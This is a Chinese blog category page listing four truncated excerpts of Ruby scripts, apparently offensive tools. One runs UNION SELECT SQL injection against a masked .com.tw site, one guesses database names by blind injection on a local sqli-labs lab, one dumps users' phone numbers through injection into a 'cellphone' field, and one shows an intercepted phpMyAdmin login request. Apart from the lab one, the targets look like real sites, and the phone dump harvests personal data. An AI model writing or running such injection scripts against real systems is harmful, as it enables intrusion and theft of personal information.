随笔分类 -  ruby

摘要:require 'http' f = open'a.txt','a' [*0..100].each do |num| url = "http://www.xxx.com.tw/about.php?id=-1%20union%20select%201,2,3,4,5,6,table_name,8,9% 阅读全文
posted @ 2020-04-11 15:02 cat2020 阅读(125) 评论(0) 推荐(0)
摘要:require 'http' f = open'q.txt','a' # 猜数据库库名 dbname = [] [*1..50].each do |number| [*'a'..'z'].each do |str| url = "http://127.0.0.1/sqli-labs-master/L 阅读全文
posted @ 2020-04-09 10:58 cat2020 阅读(105) 评论(0) 推荐(0)
摘要:1 require 'http' 2 3 f = open 'dump_6001_10000.txt','a' #建一个文本写电话号码进去 4 5 #body = "cellphone=18718350615) and (select substr(user_phone,2,1) from lzh_ 阅读全文
posted @ 2020-03-20 14:39 cat2020
摘要:拦截的包1 POST /phpMyAdmin/index.php HTTP/1.1 2 Content-Type: application/x-www-form-urlencoded 3 Connection: close 4 Host: xxx 5 User-Agent: http.rb/4.3. 阅读全文
posted @ 2020-03-20 14:14 cat2020 阅读(1607) 评论(0) 推荐(0)